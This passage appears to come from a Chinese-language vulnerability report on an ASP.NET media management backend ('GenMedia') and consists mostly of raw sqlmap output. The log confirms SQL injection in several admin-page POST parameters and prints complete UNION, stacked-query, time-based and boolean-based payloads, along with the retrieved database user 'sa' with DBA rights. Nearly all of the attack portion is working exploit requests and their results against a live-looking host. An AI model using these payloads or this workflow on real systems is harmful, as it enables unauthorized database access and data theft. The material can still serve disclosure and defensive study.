[01:52:32] [WARNING] reflective value(s) found and filtering out
2
[01:52:41] [INFO] retrieved: sa
current user:    'sa'
[01:52:41] [INFO] fetching current database
[01:52:41] [INFO] retrieving the length of query output
[01:52:41] [INFO] retrieved: 8
[01:53:10] [INFO] retrieved: GenMedia
current database:    'GenMedia'
[01:53:10] [INFO] testing if current user is DBA
current user is DBA:    True


3、
后台第二处,UserName、LogStartTime、LogStopTime均存在注入

**.**.**.**:65493/genmedia/Modules/frmLog.aspx (POST)
__VIEWSTATE=/wEPDwUJMzM0NDAyODI0D2QWAgIDD2QWBAIDDxBkDxYHZgIBAgICAwIEAgUCBhYHEAUG5YWo6YOoBQEwZ
xAFBueZu
%2BW9lQUBMWcQBQbpgIDlh7oFATJnEAUG6KeC55yLBQEzZxAFBuaWsOWingUBNWcQBQbliKDpmaQFATZnEAUG5L
%2Bu5pS5BQE3Z2RkAg0PPCsADQBkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQxidG5TZWFyY2hMb2cFB0xvZ0
xpc3QPZ2QJDaHPO320ZPwp9iHOycj8MGLw1A%3D
%3D&__EVENTVALIDATION=/wEWDALkzqfhBwKi0JWFCAK90JWFCAK80JWFCAK/0JWFCAK50JWFCAK40JWFCAK70JWFCAKvruq
2CAKRy6SwBQKgo4TOAwLotbXQCVaqz
%2B5Nhf1%2BJDcUkvbZGdreW2xy&comboLogType=0&UserName=1&LogStartTime=2015-08-05 1:45:53&LogStopTime=2015
-08-12 1:45:59&btnSearchLog.x=19&btnSearchLog.y=15


[01:56:16] [INFO] target URL is stable
[01:56:16] [INFO] ignoring POST parameter '__VIEWSTATE'
[01:56:16] [INFO] ignoring POST parameter '__EVENTVALIDATION'
[01:56:16] [INFO] testing if POST parameter 'comboLogType' is dynamic
[01:56:16] [INFO] confirming that POST parameter 'comboLogType' is dynamic
[01:56:17] [WARNING] POST parameter 'comboLogType' does not appear dynamic
[01:56:17] [WARNING] heuristic (basic) test shows that POST parameter 'comboLogT
ype' might not be injectable
[01:56:17] [INFO] testing for SQL injection on POST parameter 'comboLogType'
[01:56:17] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:56:18] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[01:56:19] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[01:56:19] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[01:56:20] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[01:56:21] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[01:56:33] [WARNING] POST parameter 'comboLogType' is not injectable
[01:56:33] [INFO] testing if POST parameter 'UserName' is dynamic
[01:56:33] [WARNING] POST parameter 'UserName' does not appear dynamic
[01:56:33] [WARNING] heuristic (basic) test shows that POST parameter 'UserName'
 might not be injectable
[01:56:33] [INFO] testing for SQL injection on POST parameter 'UserName'
[01:56:33] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:56:33] [WARNING] reflective value(s) found and filtering out
[01:56:36] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[01:56:36] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[01:56:36] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[01:56:47] [INFO] POST parameter 'UserName' seems to be 'Microsoft SQL Server/Sy
base stacked queries' injectable
[01:56:47] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[01:56:57] [INFO] POST parameter 'UserName' seems to be 'Microsoft SQL Server/Sy
base time-based blind' injectable
[01:56:57] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[01:56:57] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[01:56:58] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for current UNION query injection technique test
[01:56:58] [INFO] target URL appears to have 7 columns in query
injection not exploitable with NULL values. Do you want to try with a random int
eger value for option '--union-char'? [Y/n] y
[01:57:05] [WARNING] output with limited number of rows detected. Switching to p
artial mode
[01:57:05] [INFO] POST parameter 'UserName' is 'Generic UNION query (NULL) - 1 t
o 20 columns' injectable
POST parameter 'UserName' is vulnerable. Do you want to keep testing the others
(if any)? [y/N] y
[01:57:23] [INFO] testing if POST parameter 'LogStartTime' is dynamic
[01:57:23] [WARNING] POST parameter 'LogStartTime' does not appear dynamic
[01:57:23] [WARNING] heuristic (basic) test shows that POST parameter 'LogStartT
ime' might not be injectable
[01:57:23] [INFO] testing for SQL injection on POST parameter 'LogStartTime'
[01:57:23] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:57:26] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[01:57:27] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[01:57:27] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[01:57:38] [INFO] POST parameter 'LogStartTime' seems to be 'Microsoft SQL Serve
r/Sybase stacked queries' injectable
[01:57:38] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[01:57:48] [INFO] POST parameter 'LogStartTime' seems to be 'Microsoft SQL Serve
r/Sybase time-based blind' injectable
[01:57:48] [INFO] testing 'Generic UNION query (95) - 1 to 20 columns'
[01:57:50] [INFO] checking if the injection point on POST parameter 'LogStartTim
e' is a false positive
POST parameter 'LogStartTime' is vulnerable. Do you want to keep testing the oth
ers (if any)? [y/N] y
[01:58:05] [INFO] testing if POST parameter 'LogStopTime' is dynamic
[01:58:05] [WARNING] POST parameter 'LogStopTime' does not appear dynamic
[01:58:05] [WARNING] heuristic (basic) test shows that POST parameter 'LogStopTi
me' might not be injectable
[01:58:05] [INFO] testing for SQL injection on POST parameter 'LogStopTime'
[01:58:05] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:58:07] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[01:58:07] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[01:58:08] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[01:58:18] [INFO] POST parameter 'LogStopTime' seems to be 'Microsoft SQL Server
/Sybase stacked queries' injectable
[01:58:18] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[01:58:28] [INFO] POST parameter 'LogStopTime' seems to be 'Microsoft SQL Server
/Sybase time-based blind' injectable
[01:58:28] [INFO] testing 'Generic UNION query (95) - 1 to 20 columns'
[01:58:29] [WARNING] output with limited number of rows detected. Switching to p
artial mode
[01:58:29] [INFO] POST parameter 'LogStopTime' is 'Generic UNION query (95) - 1
to 20 columns' injectable
POST parameter 'LogStopTime' is vulnerable. Do you want to keep testing the othe
rs (if any)? [y/N] n
sqlmap identified the following injection points with a total of 239 HTTP(s) req
uests:
---
Place: POST
Parameter: UserName
    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: __VIEWSTATE=/wEPDwUJMzM0NDAyODI0D2QWAgIDD2QWBAIDDxBkDxYHZgIBAgICAwI
EAgUCBhYHEAUG5YWo6YOoBQEwZxAFBueZu W9lQUBMWcQBQbpgIDlh7oFATJnEAUG6KeC55yLBQEzZxA
FBuaWsOWingUBNWcQBQbliKDpmaQFATZnEAUG5L u5pS5BQE3Z2RkAg0PPCsADQEADxYEHgtfIURhdGF
Cb3VuZGceC18hSXRlbUNvdW50ZmRkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQx
idG5TZWFyY2hMb2cFB0xvZ0xpc3QPPCsACgIGFQEFTG9nSUQIZmTzfRIY0fpJEtYhJ9OEpagqSgPUYA=
=&__EVENTVALIDATION=/wEWDAL60Of/BgKi0JWFCAK90JWFCAK80JWFCAK/0JWFCAK50JWFCAK40JWF
CAK70JWFCAKvruq2CAKRy6SwBQKgo4TOAwLotbXQCdXs2XQpzXg/xdeUlPFzhURR/ZQr&comboLogTyp
e=0&UserName=1' UNION ALL SELECT 95,95,95,95,95,95,CHAR(113) CHAR(112) CHAR(115)
 CHAR(100) CHAR(113) CHAR(82) CHAR(111) CHAR(73) CHAR(87) CHAR(105) CHAR(111) CH
AR(74) CHAR(72) CHAR(77) CHAR(114) CHAR(113) CHAR(118) CHAR(117) CHAR(122) CHAR(
113)-- &LogStartTime=2015-08-05 1:45:53&LogStopTime=2015-08-12 1:45:59&btnSearch
Log.x=19&btnSearchLog.y=15
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __VIEWSTATE=/wEPDwUJMzM0NDAyODI0D2QWAgIDD2QWBAIDDxBkDxYHZgIBAgICAwI
EAgUCBhYHEAUG5YWo6YOoBQEwZxAFBueZu W9lQUBMWcQBQbpgIDlh7oFATJnEAUG6KeC55yLBQEzZxA
FBuaWsOWingUBNWcQBQbliKDpmaQFATZnEAUG5L u5pS5BQE3Z2RkAg0PPCsADQEADxYEHgtfIURhdGF
Cb3VuZGceC18hSXRlbUNvdW50ZmRkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQx
idG5TZWFyY2hMb2cFB0xvZ0xpc3QPPCsACgIGFQEFTG9nSUQIZmTzfRIY0fpJEtYhJ9OEpagqSgPUYA=
=&__EVENTVALIDATION=/wEWDAL60Of/BgKi0JWFCAK90JWFCAK80JWFCAK/0JWFCAK50JWFCAK40JWF
CAK70JWFCAKvruq2CAKRy6SwBQKgo4TOAwLotbXQCdXs2XQpzXg/xdeUlPFzhURR/ZQr&comboLogTyp
e=0&UserName=1'; WAITFOR DELAY '0:0:5'--&LogStartTime=2015-08-05 1:45:53&LogStop
Time=2015-08-12 1:45:59&btnSearchLog.x=19&btnSearchLog.y=15
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __VIEWSTATE=/wEPDwUJMzM0NDAyODI0D2QWAgIDD2QWBAIDDxBkDxYHZgIBAgICAwI
EAgUCBhYHEAUG5YWo6YOoBQEwZxAFBueZu W9lQUBMWcQBQbpgIDlh7oFATJnEAUG6KeC55yLBQEzZxA
FBuaWsOWingUBNWcQBQbliKDpmaQFATZnEAUG5L u5pS5BQE3Z2RkAg0PPCsADQEADxYEHgtfIURhdGF
Cb3VuZGceC18hSXRlbUNvdW50ZmRkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQx
idG5TZWFyY2hMb2cFB0xvZ0xpc3QPPCsACgIGFQEFTG9nSUQIZmTzfRIY0fpJEtYhJ9OEpagqSgPUYA=
=&__EVENTVALIDATION=/wEWDAL60Of/BgKi0JWFCAK90JWFCAK80JWFCAK/0JWFCAK50JWFCAK40JWF
CAK70JWFCAKvruq2CAKRy6SwBQKgo4TOAwLotbXQCdXs2XQpzXg/xdeUlPFzhURR/ZQr&comboLogTyp
e=0&UserName=1' WAITFOR DELAY '0:0:5'--&LogStartTime=2015-08-05 1:45:53&LogStopT
ime=2015-08-12 1:45:59&btnSearchLog.x=19&btnSearchLog.y=15
Place: POST
Parameter: LogStartTime
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __VIEWSTATE=/wEPDwUJMzM0NDAyODI0D2QWAgIDD2QWBAIDDxBkDxYHZgIBAgICAwI
EAgUCBhYHEAUG5YWo6YOoBQEwZxAFBueZu W9lQUBMWcQBQbpgIDlh7oFATJnEAUG6KeC55yLBQEzZxA
FBuaWsOWingUBNWcQBQbliKDpmaQFATZnEAUG5L u5pS5BQE3Z2RkAg0PPCsADQEADxYEHgtfIURhdGF
Cb3VuZGceC18hSXRlbUNvdW50ZmRkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQx
idG5TZWFyY2hMb2cFB0xvZ0xpc3QPPCsACgIGFQEFTG9nSUQIZmTzfRIY0fpJEtYhJ9OEpagqSgPUYA=
=&__EVENTVALIDATION=/wEWDAL60Of/BgKi0JWFCAK90JWFCAK80JWFCAK/0JWFCAK50JWFCAK40JWF
CAK70JWFCAKvruq2CAKRy6SwBQKgo4TOAwLotbXQCdXs2XQpzXg/xdeUlPFzhURR/ZQr&comboLogTyp
e=0&UserName=1&LogStartTime=2015-08-05 1:45:53'; WAITFOR DELAY '0:0:5'--&LogStop
Time=2015-08-12 1:45:59&btnSearchLog.x=19&btnSearchLog.y=15
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __VIEWSTATE=/wEPDwUJMzM0NDAyODI0D2QWAgIDD2QWBAIDDxBkDxYHZgIBAgICAwI
EAgUCBhYHEAUG5YWo6YOoBQEwZxAFBueZu W9lQUBMWcQBQbpgIDlh7oFATJnEAUG6KeC55yLBQEzZxA
FBuaWsOWingUBNWcQBQbliKDpmaQFATZnEAUG5L u5pS5BQE3Z2RkAg0PPCsADQEADxYEHgtfIURhdGF
Cb3VuZGceC18hSXRlbUNvdW50ZmRkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQx
idG5TZWFyY2hMb2cFB0xvZ0xpc3QPPCsACgIGFQEFTG9nSUQIZmTzfRIY0fpJEtYhJ9OEpagqSgPUYA=
=&__EVENTVALIDATION=/wEWDAL60Of/BgKi0JWFCAK90JWFCAK80JWFCAK/0JWFCAK50JWFCAK40JWF
CAK70JWFCAKvruq2CAKRy6SwBQKgo4TOAwLotbXQCdXs2XQpzXg/xdeUlPFzhURR/ZQr&comboLogTyp
e=0&UserName=1&LogStartTime=2015-08-05 1:45:53' WAITFOR DELAY '0:0:5'--&LogStopT
ime=2015-08-12 1:45:59&btnSearchLog.x=19&btnSearchLog.y=15
Place: POST
Parameter: LogStopTime
    Type: UNION query
    Title: Generic UNION query (95) - 7 columns
    Payload: __VIEWSTATE=/wEPDwUJMzM0NDAyODI0D2QWAgIDD2QWBAIDDxBkDxYHZgIBAgICAwI
EAgUCBhYHEAUG5YWo6YOoBQEwZxAFBueZu W9lQUBMWcQBQbpgIDlh7oFATJnEAUG6KeC55yLBQEzZxA
FBuaWsOWingUBNWcQBQbliKDpmaQFATZnEAUG5L u5pS5BQE3Z2RkAg0PPCsADQEADxYEHgtfIURhdGF
Cb3VuZGceC18hSXRlbUNvdW50ZmRkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQx
idG5TZWFyY2hMb2cFB0xvZ0xpc3QPPCsACgIGFQEFTG9nSUQIZmTzfRIY0fpJEtYhJ9OEpagqSgPUYA=
=&__EVENTVALIDATION=/wEWDAL60Of/BgKi0JWFCAK90JWFCAK80JWFCAK/0JWFCAK50JWFCAK40JWF
CAK70JWFCAKvruq2CAKRy6SwBQKgo4TOAwLotbXQCdXs2XQpzXg/xdeUlPFzhURR/ZQr&comboLogTyp
e=0&UserName=1&LogStartTime=2015-08-05 1:45:53&LogStopTime=2015-08-12 1:45:59' U
NION ALL SELECT 95,95,95,95,95,95,CHAR(113) CHAR(112) CHAR(115) CHAR(100) CHAR(1
13) CHAR(106) CHAR(83) CHAR(66) CHAR(80) CHAR(77) CHAR(110) CHAR(118) CHAR(107)
CHAR(86) CHAR(78) CHAR(113) CHAR(118) CHAR(117) CHAR(122) CHAR(113)-- &btnSearch
Log.x=19&btnSearchLog.y=15
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __VIEWSTATE=/wEPDwUJMzM0NDAyODI0D2QWAgIDD2QWBAIDDxBkDxYHZgIBAgICAwI
EAgUCBhYHEAUG5YWo6YOoBQEwZxAFBueZu W9lQUBMWcQBQbpgIDlh7oFATJnEAUG6KeC55yLBQEzZxA
FBuaWsOWingUBNWcQBQbliKDpmaQFATZnEAUG5L u5pS5BQE3Z2RkAg0PPCsADQEADxYEHgtfIURhdGF
Cb3VuZGceC18hSXRlbUNvdW50ZmRkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQx
idG5TZWFyY2hMb2cFB0xvZ0xpc3QPPCsACgIGFQEFTG9nSUQIZmTzfRIY0fpJEtYhJ9OEpagqSgPUYA=
=&__EVENTVALIDATION=/wEWDAL60Of/BgKi0JWFCAK90JWFCAK80JWFCAK/0JWFCAK50JWFCAK40JWF
CAK70JWFCAKvruq2CAKRy6SwBQKgo4TOAwLotbXQCdXs2XQpzXg/xdeUlPFzhURR/ZQr&comboLogTyp
e=0&UserName=1&LogStartTime=2015-08-05 1:45:53&LogStopTime=2015-08-12 1:45:59';
WAITFOR DELAY '0:0:5'--&btnSearchLog.x=19&btnSearchLog.y=15
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __VIEWSTATE=/wEPDwUJMzM0NDAyODI0D2QWAgIDD2QWBAIDDxBkDxYHZgIBAgICAwI
EAgUCBhYHEAUG5YWo6YOoBQEwZxAFBueZu W9lQUBMWcQBQbpgIDlh7oFATJnEAUG6KeC55yLBQEzZxA
FBuaWsOWingUBNWcQBQbliKDpmaQFATZnEAUG5L u5pS5BQE3Z2RkAg0PPCsADQEADxYEHgtfIURhdGF
Cb3VuZGceC18hSXRlbUNvdW50ZmRkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQx
idG5TZWFyY2hMb2cFB0xvZ0xpc3QPPCsACgIGFQEFTG9nSUQIZmTzfRIY0fpJEtYhJ9OEpagqSgPUYA=
=&__EVENTVALIDATION=/wEWDAL60Of/BgKi0JWFCAK90JWFCAK80JWFCAK/0JWFCAK50JWFCAK40JWF
CAK70JWFCAKvruq2CAKRy6SwBQKgo4TOAwLotbXQCdXs2XQpzXg/xdeUlPFzhURR/ZQr&comboLogTyp
e=0&UserName=1&LogStartTime=2015-08-05 1:45:53&LogStopTime=2015-08-12 1:45:59' W
AITFOR DELAY '0:0:5'--&btnSearchLog.x=19&btnSearchLog.y=15
---
there were multiple injection points, please select the one to use for following
 injections:
[0] place: POST, parameter: UserName, type: Single quoted string (default)
[1] place: POST, parameter: LogStartTime, type: Single quoted string
[2] place: POST, parameter: LogStopTime, type: Single quoted string
[q] Quit
> 1
[01:59:09] [INFO] testing Microsoft SQL Server
[01:59:09] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based payloads
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n] y
[01:59:24] [INFO] confirming Microsoft SQL Server
[01:59:35] [INFO] adjusting time delay to 3 seconds due to good response times
[01:59:35] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[01:59:35] [INFO] fetching current user
[01:59:35] [WARNING] multi-threading is considered unsafe in time-based data ret
rieval. Going to switch it off automatically
[01:59:35] [INFO] retrieved: sa
current user:    'sa'
[02:00:04] [INFO] fetching current database
[02:00:04] [INFO] retrieved: GenMedia
current database:    'GenMedia'
[02:01:32] [INFO] testing if current user is DBA
current user is DBA:    True


4、后台第三处,txtSearchUser存在注入

**.**.**.**:65493/genmedia/Modules/frmGrantUser.aspx (POST)
__VIEWSTATE=/wEPDwULLTE1OTg5MDYxOTYPZBYCAgMPZBYGAgcPEGRkFgBkAgkPEA8WBh4NRGF0YVRleHRGaWVsZAUOTW
9kdWxlVHlwZU5hbWUeDkRhdGFWYWx1ZUZpZWxkBQxNb2R1bGVUeXBlSUQeC18hRGF0YUJvdW5kZ2QQFQUM55u05pKt566h
55CGDOeCueaSreeuoeeQhgzmnYPpmZDnrqHnkIYM57O757uf566h55CGDOeUqOaIt
%2BeuoeeQhhUFATUBNAEzATIBMRQrAwVnZ2dnZxYBZmQCCw88KwANAGQYAgUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0
tleV9fFgEFDWJ0blNlYXJjaFVzZXIFCk1vZHVsZUxpc3QPZ2RGxSmyFc5rb8p60jvkI//fGKdA8w%3D
%3D&__EVENTVALIDATION=/wEWCALDqab1DAL3%2B7WiDgLIvLpRAt78kaQCAtn8kaQCAtj8kaQCAtv8kaQCAtr8kaQCWlS4QVL
sqkypUtI9hSb9sStxkHI%3D&txtSearchUser=12&ModuleTypeList=5&btnSearchUser.x=8&btnSearchUser.y=4


[02:03:45] [INFO] testing if POST parameter 'txtSearchUser' is dynamic
[02:03:45] [INFO] confirming that POST parameter 'txtSearchUser' is dynamic
[02:03:45] [INFO] POST parameter 'txtSearchUser' is dynamic
[02:03:45] [WARNING] reflective value(s) found and filtering out
[02:03:45] [WARNING] heuristic (basic) test shows that POST parameter 'txtSearch
User' might not be injectable
[02:03:45] [INFO] testing for SQL injection on POST parameter 'txtSearchUser'
[02:03:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[02:03:47] [INFO] POST parameter 'txtSearchUser' seems to be 'AND boolean-based
blind - WHERE or HAVING clause' injectable
[02:03:47] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[02:03:47] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[02:03:47] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[02:03:57] [INFO] POST parameter 'txtSearchUser' seems to be 'Microsoft SQL Serv
er/Sybase stacked queries' injectable
[02:03:57] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[02:04:08] [INFO] POST parameter 'txtSearchUser' seems to be 'Microsoft SQL Serv
er/Sybase time-based blind' injectable
[02:04:08] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[02:04:08] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[02:04:08] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for current UNION query injection technique test
[02:04:09] [INFO] target URL appears to have 12 columns in query
[02:04:10] [INFO] POST parameter 'txtSearchUser' is 'Generic UNION query (NULL)
- 1 to 20 columns' injectable
POST parameter 'txtSearchUser' is vulnerable. Do you want to keep testing the ot
hers (if any)? [y/N] y
[02:04:18] [INFO] testing if POST parameter 'ModuleTypeList' is dynamic
[02:04:18] [INFO] confirming that POST parameter 'ModuleTypeList' is dynamic
[02:04:18] [INFO] POST parameter 'ModuleTypeList' is dynamic
[02:04:19] [WARNING] heuristic (basic) test shows that POST parameter 'ModuleTyp
eList' might not be injectable
[02:04:19] [INFO] testing for SQL injection on POST parameter 'ModuleTypeList'
[02:04:19] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[02:04:20] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[02:04:21] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[02:04:21] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[02:04:22] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[02:04:23] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
injection not exploitable with NULL values. Do you want to try with a random int
eger value for option '--union-char'? [Y/n] y
[02:04:58] [WARNING] POST parameter 'ModuleTypeList' is not injectable
[02:04:58] [INFO] testing if POST parameter 'btnSearchUser.x' is dynamic
[02:04:58] [WARNING] POST parameter 'btnSearchUser.x' does not appear dynamic
[02:04:58] [WARNING] heuristic (basic) test shows that POST parameter 'btnSearch
User.x' might not be injectable
[02:04:58] [INFO] testing for SQL injection on POST parameter 'btnSearchUser.x'
[02:04:58] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[02:04:59] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[02:05:01] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[02:05:01] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[02:05:02] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[02:05:03] [INFO] testing 'Generic UNION query (58) - 1 to 10 columns'
[02:05:30] [WARNING] POST parameter 'btnSearchUser.x' is not injectable
[02:05:30] [INFO] testing if POST parameter 'btnSearchUser.y' is dynamic
[02:05:30] [WARNING] POST parameter 'btnSearchUser.y' does not appear dynamic
[02:05:31] [WARNING] heuristic (basic) test shows that POST parameter 'btnSearch
User.y' might not be injectable
[02:05:31] [INFO] testing for SQL injection on POST parameter 'btnSearchUser.y'
[02:05:31] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[02:05:32] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[02:05:33] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[02:05:33] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[02:05:34] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[02:05:35] [INFO] testing 'Generic UNION query (58) - 1 to 10 columns'
[02:06:03] [WARNING] POST parameter 'btnSearchUser.y' is not injectable
sqlmap identified the following injection points with a total of 594 HTTP(s) req
uests:
---
Place: POST
Parameter: txtSearchUser
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: __VIEWSTATE=/wEPDwULLTE1OTg5MDYxOTYPZBYCAgMPZBYGAgcPEA8WBh4NRGF0YVR
leHRGaWVsZAUIVXNlck5hbWUeDkRhdGFWYWx1ZUZpZWxkBQZVc2VySUQeC18hRGF0YUJvdW5kZ2QQFQQ
Gd2RyMTIzB21pYW8xMjMLcGFubWluZzEyMzELcGVpbGluZzEyNTgVBAE5AjE0AjM2AjM5FCsDBGdnZ2c
WAWZkAgkPEA8WBh8ABQ5Nb2R1bGVUeXBlTmFtZR8BBQxNb2R1bGVUeXBlSUQfAmdkEBUFDOebtOaSree
uoeeQhgzngrnmkq3nrqHnkIYM5p2D6ZmQ566h55CGDOezu+e7n+euoeeQhgznlKjmiLfnrqHnkIYVBQE
1ATQBMwEyATEUKwMFZ2dnZ2cWAWZkAgsPPCsADQBkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2t
LZXlfXxYBBQ1idG5TZWFyY2hVc2VyBQpNb2R1bGVMaXN0D2dk+xNkZaqJ2CB9tm9KuBIYYBJrbQ4=&__
EVENTVALIDATION=/wEWDAK/wfuSBgL3+7WiDgLIvLpRAqyliowMArSl+o8MAral8o8MAralpowMAt78
kaQCAtn8kaQCAtj8kaQCAtv8kaQCAtr8kaQCE6GHT/1b7g7aGY4ZEaR7/b3if+I=&txtSearchUser=1
2%' AND 1607=1607 AND '%'='&ModuleTypeList=5&btnSearchUser.x=8&btnSearchUser.y=4
    Type: UNION query
    Title: Generic UNION query (NULL) - 12 columns
    Payload: __VIEWSTATE=/wEPDwULLTE1OTg5MDYxOTYPZBYCAgMPZBYGAgcPEA8WBh4NRGF0YVR
leHRGaWVsZAUIVXNlck5hbWUeDkRhdGFWYWx1ZUZpZWxkBQZVc2VySUQeC18hRGF0YUJvdW5kZ2QQFQQ
Gd2RyMTIzB21pYW8xMjMLcGFubWluZzEyMzELcGVpbGluZzEyNTgVBAE5AjE0AjM2AjM5FCsDBGdnZ2c
WAWZkAgkPEA8WBh8ABQ5Nb2R1bGVUeXBlTmFtZR8BBQxNb2R1bGVUeXBlSUQfAmdkEBUFDOebtOaSree
uoeeQhgzngrnmkq3nrqHnkIYM5p2D6ZmQ566h55CGDOezu+e7n+euoeeQhgznlKjmiLfnrqHnkIYVBQE
1ATQBMwEyATEUKwMFZ2dnZ2cWAWZkAgsPPCsADQBkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2t
LZXlfXxYBBQ1idG5TZWFyY2hVc2VyBQpNb2R1bGVMaXN0D2dk+xNkZaqJ2CB9tm9KuBIYYBJrbQ4=&__
EVENTVALIDATION=/wEWDAK/wfuSBgL3+7WiDgLIvLpRAqyliowMArSl+o8MAral8o8MAralpowMAt78
kaQCAtn8kaQCAtj8kaQCAtv8kaQCAtr8kaQCE6GHT/1b7g7aGY4ZEaR7/b3if+I=&txtSearchUser=1
2%' UNION ALL SELECT NULL,CHAR(113)+CHAR(115)+CHAR(109)+CHAR(114)+CHAR(113)+CHAR
(83)+CHAR(97)+CHAR(118)+CHAR(117)+CHAR(71)+CHAR(103)+CHAR(67)+CHAR(85)+CHAR(79)+
CHAR(70)+CHAR(113)+CHAR(101)+CHAR(101)+CHAR(121)+CHAR(113),NULL,NULL,NULL,NULL,N
ULL,NULL,NULL,NULL,NULL,NULL-- &ModuleTypeList=5&btnSearchUser.x=8&btnSearchUser
.y=4
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __VIEWSTATE=/wEPDwULLTE1OTg5MDYxOTYPZBYCAgMPZBYGAgcPEA8WBh4NRGF0YVR
leHRGaWVsZAUIVXNlck5hbWUeDkRhdGFWYWx1ZUZpZWxkBQZVc2VySUQeC18hRGF0YUJvdW5kZ2QQFQQ
Gd2RyMTIzB21pYW8xMjMLcGFubWluZzEyMzELcGVpbGluZzEyNTgVBAE5AjE0AjM2AjM5FCsDBGdnZ2c
WAWZkAgkPEA8WBh8ABQ5Nb2R1bGVUeXBlTmFtZR8BBQxNb2R1bGVUeXBlSUQfAmdkEBUFDOebtOaSree
uoeeQhgzngrnmkq3nrqHnkIYM5p2D6ZmQ566h55CGDOezu+e7n+euoeeQhgznlKjmiLfnrqHnkIYVBQE
1ATQBMwEyATEUKwMFZ2dnZ2cWAWZkAgsPPCsADQBkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2t
LZXlfXxYBBQ1idG5TZWFyY2hVc2VyBQpNb2R1bGVMaXN0D2dk+xNkZaqJ2CB9tm9KuBIYYBJrbQ4=&__
